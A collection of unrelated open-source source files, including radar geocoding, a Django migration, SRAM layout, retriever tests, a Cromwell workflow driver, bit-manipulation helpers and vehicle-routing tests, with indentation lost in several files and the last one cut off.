"""
Transform input data using Imputer with fit results
Parameters
----------
        data: DTable, each value should be a list
        transform_value: list, the per-column replacement values returned by fit
        output_format: str, the output data format. The output data can be 'str', 'int', 'float'. Default origin, the original format as input data
Returns
----------
        transform_data: data_instance, data after transformation
"""
if output_format not in self.support_output_format:
raise ValueError("Unsupport output_format:{}".format(output_format))
output_format = self.support_output_format[output_format]
        # All replace methods currently use the "col" area; keep replace_area for now
# replace_area = self.support_replace_area[replace_method]
replace_area = "col"
process_data = self.__transform_replace(data, transform_value, replace_area, output_format)
self.cols_transform_impute_rate = self.__get_impute_rate_from_replace_data(process_data)
process_data = process_data.mapValues(lambda v: v[0])
process_data.schema = data.schema
return process_data
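# Usage sketch (assumes `data_instances` is a DTable whose values are lists, as the
# fit/transform docstrings above require; the variable names are illustrative):
#
#   imputer = Imputer()  # defaults to treating '', 'none', 'null', 'na' as missing
#   filled, col_values = imputer.fit(data_instances,
#                                    replace_method='mean',
#                                    output_format='float')
#   # reuse the per-column values learned by fit on new data
#   new_filled = imputer.transform(new_data, transform_value=col_values,
#                                  output_format='float')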
|
components/isceobj/StripmapProc/runGeo2rdr.py
|
vincentschut/isce2
| 1,133 |
78448
|
<reponame>vincentschut/isce2<gh_stars>1000+
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2012 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isceobj
import stdproc
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util.Polynomial import Polynomial
from isceobj.Util.Poly2D import Poly2D
from isceobj.Constants import SPEED_OF_LIGHT
import logging
import numpy as np
import datetime
import os
logger = logging.getLogger('isce.insar.runGeo2rdr')
def runGeo2rdr(self):
from zerodop.geo2rdr import createGeo2rdr
from isceobj.Planet.Planet import Planet
logger.info("Running geo2rdr")
info = self._insar.loadProduct( self._insar.secondarySlcCropProduct)
offsetsDir = self.insar.offsetsDirname
os.makedirs(offsetsDir, exist_ok=True)
grdr = createGeo2rdr()
grdr.configure()
planet = info.getInstrument().getPlatform().getPlanet()
grdr.slantRangePixelSpacing = info.getInstrument().getRangePixelSize()
grdr.prf = info.PRF #info.getInstrument().getPulseRepetitionFrequency()
grdr.radarWavelength = info.getInstrument().getRadarWavelength()
grdr.orbit = info.getOrbit()
grdr.width = info.getImage().getWidth()
grdr.length = info.getImage().getLength()
grdr.wireInputPort(name='planet', object=planet)
grdr.lookSide = info.instrument.platform.pointingDirection
grdr.setSensingStart(info.getSensingStart())
grdr.rangeFirstSample = info.startingRange
grdr.numberRangeLooks = 1
grdr.numberAzimuthLooks = 1
if self.insar.secondaryGeometrySystem.lower().startswith('native'):
p = [x/info.PRF for x in info._dopplerVsPixel]
else:
p = [0.]
grdr.dopplerCentroidCoeffs = p
grdr.fmrateCoeffs = [0.]
###Input and output files
grdr.rangeOffsetImageName = os.path.join(offsetsDir, self.insar.rangeOffsetFilename)
grdr.azimuthOffsetImageName = os.path.join(offsetsDir, self.insar.azimuthOffsetFilename)
latFilename = os.path.join(self.insar.geometryDirname, self.insar.latFilename + '.full')
lonFilename = os.path.join(self.insar.geometryDirname, self.insar.lonFilename + '.full')
heightFilename = os.path.join(self.insar.geometryDirname, self.insar.heightFilename + '.full')
demImg = isceobj.createImage()
demImg.load(heightFilename + '.xml')
demImg.setAccessMode('READ')
grdr.demImage = demImg
latImg = isceobj.createImage()
latImg.load(latFilename + '.xml')
latImg.setAccessMode('READ')
grdr.latImage = latImg
lonImg = isceobj.createImage()
lonImg.load(lonFilename + '.xml')
lonImg.setAccessMode('READ')
grdr.lonImage = lonImg
grdr.outputPrecision = 'DOUBLE'
grdr.geo2rdr()
return
|
awx/main/migrations/0129_unifiedjob_installed_collections.py
|
bhyunki/awx
| 11,396 |
78452
|
<reponame>bhyunki/awx<filename>awx/main/migrations/0129_unifiedjob_installed_collections.py
# Generated by Django 2.2.16 on 2021-02-16 20:27
import awx.main.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0128_organiaztion_read_roles_ee_admin'),
]
operations = [
migrations.AddField(
model_name='unifiedjob',
name='installed_collections',
field=awx.main.fields.JSONBField(
blank=True, default=dict, editable=False, help_text='The Collections names and versions installed in the execution environment.'
),
),
]
|
utils/losses/__init__.py
|
ozcell/pytorch-auto-drive
| 292 |
78465
|
# Implementation based on pytorch 1.6.0
from .lane_seg_loss import *
from .hungarian_loss import *
|
compiler/pgates/pinvbuf.py
|
im-world/OpenRAM
| 335 |
78501
|
<reponame>im-world/OpenRAM<filename>compiler/pgates/pinvbuf.py
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
import pgate
from vector import vector
from sram_factory import factory
from tech import layer
class pinvbuf(pgate.pgate):
"""
This is a simple inverter/buffer used for driving loads. It is
used in the column decoder for 1:2 decoding and as the clock buffer.
"""
def __init__(self, name, size=4, height=None):
debug.info(1, "creating pinvbuf {}".format(name))
self.add_comment("size: {}".format(size))
self.stage_effort = 4
self.row_height = height
# FIXME: Change the number of stages to support high drives.
# stage effort of 4 or less
# The pinvbuf has a FO of 2 for the first stage, so the second stage
# should be sized "half" to prevent loading of the first stage
self.size = size
self.predriver_size = max(int(self.size / (self.stage_effort / 2)), 1)
# Creates the netlist and layout
super().__init__(name)
def create_netlist(self):
self.add_pins()
self.add_modules()
self.create_insts()
def create_layout(self):
self.width = 2 * self.inv1.width + self.inv2.width
self.height = 2 * self.inv1.height
self.place_modules()
self.route_wires()
self.add_layout_pins()
self.add_boundary()
self.offset_all_coordinates()
def add_pins(self):
self.add_pin("A")
self.add_pin("Zb")
self.add_pin("Z")
self.add_pin("vdd")
self.add_pin("gnd")
def add_modules(self):
# Shield the cap, but have at least a stage effort of 4
input_size = max(1, int(self.predriver_size / self.stage_effort))
self.inv = factory.create(module_type="pinv",
size=input_size,
height=self.row_height)
self.add_mod(self.inv)
self.inv1 = factory.create(module_type="pinv",
size=self.predriver_size,
height=self.row_height)
self.add_mod(self.inv1)
self.inv2 = factory.create(module_type="pinv",
size=self.size,
height=self.row_height)
self.add_mod(self.inv2)
def create_insts(self):
# Create INV1 (capacitance shield)
self.inv1_inst = self.add_inst(name="buf_inv1",
mod=self.inv)
self.connect_inst(["A", "zb_int", "vdd", "gnd"])
self.inv2_inst = self.add_inst(name="buf_inv2",
mod=self.inv1)
self.connect_inst(["zb_int", "z_int", "vdd", "gnd"])
self.inv3_inst = self.add_inst(name="buf_inv3",
mod=self.inv2)
self.connect_inst(["z_int", "Zb", "vdd", "gnd"])
self.inv4_inst = self.add_inst(name="buf_inv4",
mod=self.inv2)
self.connect_inst(["zb_int", "Z", "vdd", "gnd"])
def place_modules(self):
# Add INV1 to the left (capacitance shield)
self.inv1_inst.place(vector(0, 0))
# Add INV2 to the right of INV1
self.inv2_inst.place(vector(self.inv1_inst.rx(), 0))
# Add INV3 to the right of INV2
self.inv3_inst.place(vector(self.inv2_inst.rx(), 0))
# Add INV4 flipped to the bottom aligned with INV2
self.inv4_inst.place(offset=vector(self.inv2_inst.rx(),
2 * self.inv2.height),
mirror="MX")
def route_wires(self):
if "li" in layer:
route_stack = self.li_stack
else:
route_stack = self.m1_stack
# inv1 Z to inv2 A
z1_pin = self.inv1_inst.get_pin("Z")
a2_pin = self.inv2_inst.get_pin("A")
mid_point = vector(z1_pin.cx(), a2_pin.cy())
self.add_path(z1_pin.layer, [z1_pin.center(), mid_point, a2_pin.center()])
self.add_via_stack_center(from_layer=z1_pin.layer,
to_layer=a2_pin.layer,
offset=a2_pin.center())
# inv2 Z to inv3 A
z2_pin = self.inv2_inst.get_pin("Z")
a3_pin = self.inv3_inst.get_pin("A")
mid_point = vector(z2_pin.cx(), a3_pin.cy())
self.add_path(z2_pin.layer, [z2_pin.center(), mid_point, a3_pin.center()])
self.add_via_stack_center(from_layer=z2_pin.layer,
to_layer=a3_pin.layer,
offset=a3_pin.center())
# inv1 Z to inv4 A (up and over)
z1_pin = self.inv1_inst.get_pin("Z")
a4_pin = self.inv4_inst.get_pin("A")
mid_point = vector(z1_pin.cx(), a4_pin.cy())
self.add_wire(route_stack,
[z1_pin.center(), mid_point, a4_pin.center()])
self.add_via_stack_center(from_layer=z1_pin.layer,
to_layer=route_stack[2],
offset=z1_pin.center())
def add_layout_pins(self):
        # Continuous vdd rail along with label.
vdd_pin = self.inv1_inst.get_pin("vdd")
self.add_layout_pin(text="vdd",
layer=vdd_pin.layer,
offset=vdd_pin.ll().scale(0, 1),
width=self.width,
height=vdd_pin.height())
        # Continuous gnd rail (top row, from the mirrored inv4) along with label.
gnd_pin = self.inv4_inst.get_pin("gnd")
self.add_layout_pin(text="gnd",
layer=gnd_pin.layer,
offset=gnd_pin.ll().scale(0, 1),
width=self.width,
height=gnd_pin.height())
        # Continuous gnd rail along with label.
gnd_pin = self.inv1_inst.get_pin("gnd")
self.add_layout_pin(text="gnd",
layer=gnd_pin.layer,
offset=gnd_pin.ll().scale(0, 1),
width=self.width,
                            height=gnd_pin.height())
z_pin = self.inv4_inst.get_pin("Z")
self.add_layout_pin_rect_center(text="Z",
layer=z_pin.layer,
offset=z_pin.center())
zb_pin = self.inv3_inst.get_pin("Z")
self.add_layout_pin_rect_center(text="Zb",
layer=zb_pin.layer,
offset=zb_pin.center())
a_pin = self.inv1_inst.get_pin("A")
self.add_layout_pin_rect_center(text="A",
layer=a_pin.layer,
offset=a_pin.center())
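# Illustrative instantiation sketch (mirrors how this module builds its own
# sub-cells through the factory; the exact module_type string is an assumption):
#
#   clk_buf = factory.create(module_type="pinvbuf", size=16)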
|
discovery-provider/src/utils/indexing_errors.py
|
Tenderize/audius-protocol
| 429 |
78509
|
class IndexingError(Exception):
"""Exception raised for errors in the indexing flow.
Attributes:
type -- One of 'user', 'user_replica_set', 'user_library', 'tracks', 'social_features', 'playlists'
blocknumber -- block number of error
blockhash -- block hash of error
txhash -- transaction hash of error
message -- error message
"""
def __init__(self, type, blocknumber, blockhash, txhash, message):
super().__init__(message)
self.type = type
self.blocknumber = blocknumber
self.blockhash = blockhash
self.txhash = txhash
self.message = message
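# Minimal usage sketch (illustrative values only):
#
#   raise IndexingError(
#       type="tracks",
#       blocknumber=12345678,
#       blockhash="0xabc...",
#       txhash="0xdef...",
#       message="failed to parse track metadata",
#   )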
|
cherche/retrieve/test_retrieve.py
|
raphaelsty/cherche
| 193 |
78510
|
<reponame>raphaelsty/cherche
import pytest
from .. import rank, retrieve
def cherche_retrievers(on: str, k: int = None):
"""List of retrievers available in cherche."""
yield from [
retrieve.TfIdf(key="title", on=on, documents=documents(), k=k),
retrieve.BM25Okapi(key="title", on=on, documents=documents(), k=k),
retrieve.BM25L(key="title", on=on, documents=documents(), k=k),
retrieve.Lunr(key="title", on=on, documents=documents(), k=k),
]
def documents():
return [
{"title": "Paris", "article": "This town is the capital of France", "author": "Wikipedia"},
{
"title": "Eiffel tower",
"article": "Eiffel tower is based in Paris",
"author": "Wikipedia",
},
{"title": "Montreal", "article": "Montreal is in Canada.", "author": "Wikipedia"},
]
@pytest.mark.parametrize(
"retriever, documents, k",
[
pytest.param(
retriever,
documents(),
k,
id=f"retriever: {retriever.__class__.__name__}, k: {k}",
)
for k in [None, 0, 2, 4]
for retriever in cherche_retrievers(on="article", k=k)
],
)
def test_retriever(retriever, documents: list, k: int):
"""Test retriever. Test if the number of retrieved documents is coherent.
    Check for unknown tokens in the corpus; the retriever should return an empty list.
"""
retriever = retriever + documents
retriever.add(documents)
# A single document contains town.
answers = retriever(q="town")
if k is None or k >= 1:
assert len(answers) == 1
else:
assert len(answers) == 0
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
# All documents contains "Montreal Eiffel France"
answers = retriever(q="Montreal Eiffel France")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == k
@pytest.mark.parametrize(
"retriever, documents, k",
[
pytest.param(
retriever,
documents(),
k,
id=f"Multiple fields retriever: {retriever.__class__.__name__}, k: {k}",
)
for k in [None, 0, 2, 4]
for retriever in cherche_retrievers(on=["article", "title", "author"], k=k)
],
)
def test_fields_retriever(retriever, documents: list, k: int):
"""Test retriever when providing multiples fields."""
retriever = retriever + documents
# All documents have Wikipedia as author.
answers = retriever(q="Wikipedia")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == max(k, 0)
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
    # Two documents contain "Paris".
answers = retriever(q="Paris")
if k is None or k >= 2:
assert len(answers) == 2
else:
assert len(answers) == max(k, 0)
@pytest.mark.parametrize(
"documents, k",
[
pytest.param(
documents(),
k,
id=f"retriever: Flash, k: {k}",
)
for k in [None, 0, 2, 4]
],
)
def test_flash(documents: list, k: int):
"""Test Flash retriever."""
# Reset retriever
retriever = retrieve.Flash(key="title", k=k, on="title") + documents
retriever.add(documents)
# A single document contains town.
answers = retriever(q="Paris")
if k is None or k >= 1:
assert len(answers) == 1
else:
assert len(answers) == 0
for sample in answers:
for key in ["title", "article", "author"]:
assert key in sample
# Unknown token.
answers = retriever(q="Unknown")
assert len(answers) == 0
    # The query should match every document.
answers = retriever(q="<NAME>")
if k is None or k >= len(documents):
assert len(answers) == len(documents)
else:
assert len(answers) == k
@pytest.mark.parametrize(
"documents, k",
[
pytest.param(
documents(),
k,
id=f"retriever: ElasticSearch, k: {k}",
)
for k in [None, 0, 2, 4]
],
)
def test_elastic(documents, k):
"""Test Elasticsearch if elastic server is running. Test elasticsearch as a retriever for a
single field and multiple fields. Test if storing"""
from elasticsearch import Elasticsearch
from sentence_transformers import SentenceTransformer
es = Elasticsearch()
if es.ping():
ranker = rank.Encoder(
key="title",
encoder=SentenceTransformer(
"sentence-transformers/all-mpnet-base-v2",
).encode,
on=["title", "article", "author"],
k=k,
)
retriever = retrieve.Elastic(key="title", on="article", k=k, es=es, index="test_cherche")
retriever.reset()
retriever.add(documents)
test_retriever(retriever=retriever, documents=documents, k=k)
retriever = retrieve.Elastic(
key="title", on=["title", "article", "author"], k=k, es=es, index="test_cherche"
)
retriever.reset()
retriever.add(documents)
test_fields_retriever(retriever, documents=documents, k=k)
# Store embeddings using Elasticsearch
retriever.reset()
retriever.add_embeddings(documents=documents, ranker=ranker)
pipeline = retriever + ranker
answers = pipeline("Paris")
if k is None or k >= 2:
assert len(answers) == 2
else:
assert len(answers) == max(k, 0)
|
src/mcedit2/synth/l_system_plugin.py
|
elcarrion06/mcedit2
| 673 |
78549
|
"""
l_system_plugin
"""
from __future__ import absolute_import, division, print_function
import logging
from mcedit2.editortools.generate import GeneratePlugin
from mcedit2.synth.l_system import renderBlocks, renderSceneNodes, applyReplacementsIterated
from mcedit2.util.showprogress import showProgress
from mcedit2.widgets.spinslider import SpinSlider
log = logging.getLogger(__name__)
class LSystemPlugin(GeneratePlugin):
"""
A GeneratePlugin subclass intended for driving an L-system.
Most of the GeneratePlugin methods are already implemented. To use an LSystemPlugin,
you need to implement `getOptionsWidget` and `createInitialSymbol` - after that,
previewing and generating the L-System is taken care of by LSystemPlugin.
In your implementation of `getOptionsWidget`, you should add `self.iterationsSlider`
to your widget to control the iteration depth.
A `recursive` attribute is also available. If your L-System is not recursively defined - that
is, a finite number of iterations will result in a symbol list that has no further `replace`
methods defined, you may set the `recursive` attribute of the LSystemPlugin to False. Setting
`recursive` to False will cause the block and schematic renderer to run the replacement rules
until no further replacements occur (or until MAX_ITERATIONS iterations), and the value of
`iterationsSlider` will be ignored for the final generation. The `iterationsSlider` will
still affect the GL rendering, which is useful for inspecting the system's state after every
iteration.
"""
recursive = True
MAX_ITERATIONS = 50
def __init__(self, editorSession):
super(LSystemPlugin, self).__init__(editorSession)
self.optionsWidget = None
self.iterationsSlider = SpinSlider()
self.iterationsSlider.setMinimum(1)
self.iterationsSlider.setMaximum(50)
self.iterationsSlider.setValue(3)
self.iterationsSlider.valueChanged.connect(self.updatePreview)
def createInitialSymbol(self, bounds):
"""
Create and return the initial Symbol for the L-System. The symbol is typically initialized
using values input by the user via the options widget.
:param bounds: The bounding box selected with the Generate tool, in world coordinates.
:type bounds: BoundingBox
:return: The initial Symbol for this L-System
:rtype: Symbol
"""
raise NotImplementedError
def createSymbolList(self, bounds, indefinite=False):
system = self.createInitialSymbol(bounds)
symbol_list = [system]
if indefinite:
max_iterations = self.MAX_ITERATIONS
else:
max_iterations = self.iterationsSlider.value()
def process(_symbol_list):
for iteration, _symbol_list in applyReplacementsIterated(_symbol_list, max_iterations):
yield iteration, max_iterations
yield _symbol_list
symbol_list = showProgress("Generating...", process(symbol_list), cancel=True)
if symbol_list is False:
return None
return symbol_list
def getPreviewNode(self, bounds):
symbol_list = self.createSymbolList(bounds)
if symbol_list is None:
return None
log.info("Rendering symbols to OpenGL")
sceneNodes = self.renderSceneNodes(symbol_list)
return sceneNodes
def renderSceneNodes(self, symbol_list):
return renderSceneNodes(symbol_list)
def generateInSchematic(self, dimension, originalBounds):
symbol_list = self.createSymbolList(originalBounds)
if symbol_list is None:
return None
log.info("Rendering symbols to blocks")
rendering = self.renderBlocks(symbol_list)
log.info("Editing %d blocks" % len(rendering))
for x, y, z, blockType in rendering:
x -= originalBounds.minx
y -= originalBounds.miny
z -= originalBounds.minz
dimension.setBlock(x, y, z, blockType)
def renderBlocks(self, symbol_list):
return renderBlocks(symbol_list)
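# Hedged usage sketch (illustrative only, not mcedit2 API): per the class docstring,
# a concrete plugin only has to supply `getOptionsWidget` and `createInitialSymbol`.
# The options widget class and `MyTreeSymbol` below are hypothetical placeholders.
#
# class MyLSystemPlugin(LSystemPlugin):
#     def getOptionsWidget(self):
#         if self.optionsWidget is None:
#             widget = MyOptionsWidget()                        # hypothetical Qt widget
#             widget.layout().addWidget(self.iterationsSlider)  # iteration depth control
#             self.optionsWidget = widget
#         return self.optionsWidget
#     def createInitialSymbol(self, bounds):
#         return MyTreeSymbol(bounds)                           # hypothetical Symbol subclass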
|
runners/cromwell_on_google/wdl_runner/cromwell_driver.py
|
ffinfo/wdl
| 185 |
78551
|
#!/usr/bin/python
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
# cromwell_driver.py
#
# This script provides a library interface to Cromwell, namely:
# * Start the Cromwell server
# * Submit execution requests to Cromwell
# * Poll Cromwell for job status
import logging
import os
import subprocess
import time
import requests
import sys_util
class CromwellDriver(object):
def __init__(self, cromwell_conf, cromwell_jar):
self.cromwell_conf = cromwell_conf
self.cromwell_jar = cromwell_jar
self.cromwell_proc = None
def start(self):
"""Start the Cromwell service."""
if self.cromwell_proc:
logging.info("Request to start Cromwell: already running")
return
self.cromwell_proc = subprocess.Popen([
'java',
'-Dconfig.file=' + self.cromwell_conf,
'-Xmx4g',
'-jar', self.cromwell_jar,
'server'])
logging.info("Started Cromwell")
def fetch(self, wf_id=None, post=False, files=None, method=None):
url = 'http://localhost:8000/api/workflows/v1'
if wf_id is not None:
url = os.path.join(url, wf_id)
if method is not None:
url = os.path.join(url, method)
if post:
r = requests.post(url, files=files)
else:
r = requests.get(url)
return r.json()
def submit(self, wdl, workflow_inputs, workflow_options, sleep_time=15):
"""Post new job to the server and poll for completion."""
# Add required input files
with open(wdl, 'rb') as f:
wdl_source = f.read()
with open(workflow_inputs, 'rb') as f:
wf_inputs = f.read()
files = {
'wdlSource': wdl_source,
'workflowInputs': wf_inputs,
}
# Add workflow options if specified
if workflow_options:
with open(workflow_options, 'rb') as f:
wf_options = f.read()
files['workflowOptions'] = wf_options
# After Cromwell start, it may take a few seconds to be ready for requests.
# Poll up to a minute for successful connect and submit.
job = None
max_time_wait = 60
wait_interval = 5
time.sleep(wait_interval)
        for attempt in range(max_time_wait // wait_interval):
try:
job = self.fetch(post=True, files=files)
break
except requests.exceptions.ConnectionError as e:
logging.info("Failed to connect to Cromwell (attempt %d): %s",
attempt + 1, e)
time.sleep(wait_interval)
if not job:
sys_util.exit_with_error(
"Failed to connect to Cromwell after {0} seconds".format(
max_time_wait))
if job['status'] != 'Submitted':
sys_util.exit_with_error(
"Job status from Cromwell was not 'Submitted', instead '{0}'".format(
job['status']))
# Job is running.
cromwell_id = job['id']
logging.info("Job submitted to Cromwell. job id: %s", cromwell_id)
# Poll Cromwell for job completion.
attempt = 0
max_failed_attempts = 3
while True:
time.sleep(sleep_time)
            # Cromwell occasionally fails to respond to the status request.
# Only give up after 3 consecutive failed requests.
try:
status_json = self.fetch(wf_id=cromwell_id, method='status')
attempt = 0
except requests.exceptions.ConnectionError as e:
attempt += 1
logging.info("Error polling Cromwell job status (attempt %d): %s",
attempt, e)
if attempt >= max_failed_attempts:
sys_util.exit_with_error(
"Cromwell did not respond for %d consecutive requests" % attempt)
continue
status = status_json['status']
if status == 'Succeeded':
break
elif status == 'Submitted':
pass
elif status == 'Running':
pass
else:
sys_util.exit_with_error(
"Status of job is not Submitted, Running, or Succeeded: %s" % status)
logging.info("Cromwell job status: %s", status)
# Cromwell produces a list of outputs and full job details
outputs = self.fetch(wf_id=cromwell_id, method='outputs')
metadata = self.fetch(wf_id=cromwell_id, method='metadata')
return outputs, metadata
if __name__ == '__main__':
pass
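# Hedged usage sketch: wires up the start -> submit flow described in the header
# comment. The conf/jar/WDL/JSON paths are placeholder assumptions; wdl_runner
# normally supplies the real ones.
def _example_drive_cromwell():
    logging.basicConfig(level=logging.INFO)
    driver = CromwellDriver('cromwell.conf', 'cromwell.jar')
    driver.start()
    # submit() polls the /status endpoint until the workflow succeeds or errors out
    outputs, metadata = driver.submit('workflow.wdl', 'inputs.json', None)
    logging.info("workflow outputs: %s", outputs)
    return outputs, metadata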
|
ch2/lineards/bit_manipulation.py
|
lyskevin/cpbook-code
| 1,441 |
78553
|
<reponame>lyskevin/cpbook-code
import math
def isOn(S, j):
return (S & (1<<j))
def setBit(S, j):
return (S | (1<<j))
def clearBit(S, j):
return (S & (~(1<<j)))
def toggleBit(S, j):
return (S ^ (1<<j))
def lowBit(S):
return (S&(-S))
def setAll(n):
return ((1<<n)-1)
def modulo(S, N): # returns S % N, where N is a power of 2
return ((S) & (N-1))
def isPowerOfTwo(S):
return (not(S & (S - 1)))
def nearestPowerOfTwo(S):
return 1<<round(math.log2(S))
def turnOffLastBit(S):
return (S & (S - 1))
def turnOnLastZero(S):
return ((S) | (S + 1))
def turnOffLastConsecutiveBits(S):
return ((S) & (S + 1))
def turnOnLastConsecutiveZeroes(S):
return ((S) | (S-1))
def printSet(vS): # in binary representation
print("S = {} = {:b}".format(vS, vS))
def main():
print("1. Representation (all indexing are 0-based and counted from right)")
S = 34
printSet(S)
print()
print("2. Multiply S by 2, then divide S by 4 (2x2), then by 2")
S = 34
printSet(S)
S = S << 1
printSet(S)
S = S >> 2
printSet(S)
S = S >> 1
printSet(S)
print()
print("3. Set/turn on the 3-rd item of the set")
S = 34
printSet(S)
S = setBit(S, 3)
printSet(S)
print()
print("4. Check if the 3-rd and then 2-nd item of the set is on?")
S = 42
printSet(S)
T = isOn(S, 3)
print("T = {}, {}".format(T, "ON" if T else "OFF"))
T = isOn(S, 2)
print("T = {}, {}".format(T, "ON" if T else "OFF"))
print()
print("5. Clear/turn off the 1-st item of the set")
S = 42
printSet(S)
S = clearBit(S, 1)
printSet(S)
print()
print("6. Toggle the 2-nd item and then 3-rd item of the set")
S = 40
printSet(S)
S = toggleBit(S, 2)
printSet(S)
S = toggleBit(S, 3)
printSet(S)
print()
print("7. Check the first bit from right that is on")
S = 40
printSet(S)
T = lowBit(S)
print("T = {} (this is always a power of 2)".format(T))
S = 52
printSet(S)
T = lowBit(S)
print("T = {} (this is always a power of 2)".format(T))
    print()
print("8. Turn on all bits in a set of size n = 6")
S = setAll(6)
printSet(S)
print()
print("9. Other tricks (not shown in the book)")
print("8 % 4 = {}".format(modulo(8, 4)))
print("7 % 4 = {}".format(modulo(7, 4)))
print("6 % 4 = {}".format(modulo(6, 4)))
print("5 % 4 = {}".format(modulo(5, 4)))
print("is {} power of two? {}".format(9, isPowerOfTwo(9)))
print("is {} power of two? {}".format(8, isPowerOfTwo(8)))
print("is {} power of two? {}".format(7, isPowerOfTwo(7)))
for i in range(1, 17):
print("Nearest power of two of {} is {}".format(i, nearestPowerOfTwo(i)))
print("S = {}, turn off last bit in S, S = {}".format(40, turnOffLastBit(40)))
print("S = {}, turn on last zero in S, S = {}".format(41, turnOnLastZero(41)))
print("S = {}, turn off last consecutive bits in S, S = {}".format(39, turnOffLastConsecutiveBits(39)))
print("S = {}, turn on last consecutive zeroes in S, S = {}".format(36, turnOnLastConsecutiveZeroes(36)))
main()
|
zella-graphics/arc-chord-pie/example-2.py
|
whitmans-max/python-examples
| 140 |
78581
|
<filename>zella-graphics/arc-chord-pie/example-2.py
from graphics import *
# --- constants ---
WIDTH = 300
HEIGHT = 300
# --- functions ---
def moves():
# move figure 1
s = win.itemcget(fig1, 'start')
win.itemconfig(fig1, start=float(s)+5)
# move figure 2
s = win.itemcget(fig2, 'start')
win.itemconfig(fig2, start=float(s)+5)
# move figure 3
s = win.itemcget(fig3, 'start')
win.itemconfig(fig3, start=float(s)+5)
# run again after 100ms (0.1s)
win.after(100, moves)
# --- main ----
win = GraphWin("Patch", WIDTH, HEIGHT)
bbox = (5, 5, WIDTH-5, HEIGHT-5)
fig1 = win.create_arc(bbox, fill="red", outline='green', width=3, start=0, extent=90, style='arc')
fig2 = win.create_arc(bbox, fill="red", outline='green', width=3, start=95, extent=90, style='chord')
fig3 = win.create_arc(bbox, fill="red", outline='green', width=3, start=190, extent=90, style='pieslice')
# run first time - to start animation
moves()
#win.getKey()
win.getMouse()
win.close()
|
tests/test_solution_op_3optstar.py
|
juicetinliu/VeRyPy
| 156 |
78588
|
<filename>tests/test_solution_op_3optstar.py
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 05 19:00:19 2018
@author: juherask
"""
# Written in Python 2.7, but try to maintain Python 3+ compatibility
from __future__ import print_function
from __future__ import division
import sys
import unittest
from time import time
import numpy as np
from local_search import LSOPT, do_local_search
from local_search.solution_operators import do_3optstar_move
from classic_heuristics.nearest_neighbor import nearest_neighbor_init
from cvrp_io import generate_CVRP
from cvrp_ops import check_solution_feasibility, calculate_objective
from util import sol2routes, routes2sol
from test_intra_route_local_search_operation import Test3Opt
PRINT_ONLY_FINAL_RESULT = True
def _intra_route_3optstar_call(sol, D, strategy=LSOPT.FIRST_ACCEPT):
return do_3optstar_move(sol, D, [1.0]*len(D), len(D), None, strategy)
class TestIntraRouteMoves3OptStarSolutionOperator(Test3Opt):
""" This tests all the move operators on a single route. The test reuses
the test_local_search_operation.Test3Opt unit test.
"""
def setUp(self):
super(TestIntraRouteMoves3OptStarSolutionOperator, self).setUp()
self.move_op = _intra_route_3optstar_call
#TODO: write this
#class TestInterRouteMoves3OptStarSolutionOperator(unittest.TestCase):
# e.g. 6 nodes on a circular formation, depot at the center but tad closer to one
def _strategy_to_str(strategy):
    if strategy == LSOPT.FIRST_ACCEPT:
        return "FIRST_ACCEPT"
    elif strategy == LSOPT.BEST_ACCEPT:
        return "BEST_ACCEPT"
    else:
        return "N/A"
class TestSmoke3OptStarSolutionOperator(unittest.TestCase):
def setUp(self):
self.D = np.array([[ 0, 195, 168, 293, 236, 276],
[195, 0, 223, 225, 226, 434],
[168, 223, 0, 158, 377, 236],
[293, 225, 158, 0, 440, 380],
[236, 226, 377, 440, 0, 507],
[276, 434, 236, 380, 507, 0]])
self.d = [0, 14, 1, 24, 50, 13]
self.C = 50
self.initial_sol=[0, 5, 3, 0, 4, 0, 1, 2, 0]
def test_smoke(self):
print("in", self.initial_sol)
smoke_sol = do_local_search([do_3optstar_move],
self.initial_sol,
self.D, self.d, self.C)
print("out", smoke_sol)
class TestRandomStressOn3OptStarSolutionOperator(unittest.TestCase):
# abuse class variable to repeat with different problem sizes
problem_size = 5
def setUp(self):
N = TestRandomStressOn3OptStarSolutionOperator.problem_size
problem = generate_CVRP(N, 50, 10, 5)
aN,pts,d,D,C = (problem.size, problem.coordinate_points,
problem.customer_demands, problem.distance_matrix,
problem.capacity_constraint)
pts = None
d = [int(dv) for dv in d]
D = D.astype(int)
problem = aN,pts,d,D,C
self.naive_sol = routes2sol( [[n] for n in range(1,aN+1)] )
self.nn_sol = nearest_neighbor_init(D, d, C)
self.L = max( calculate_objective(r,D) for r in sol2routes(self.nn_sol) )
self.N = aN
self.problem = (aN,pts,d,D,C)
def _improve_with_3opt_star(self, problem, solution, strategy):
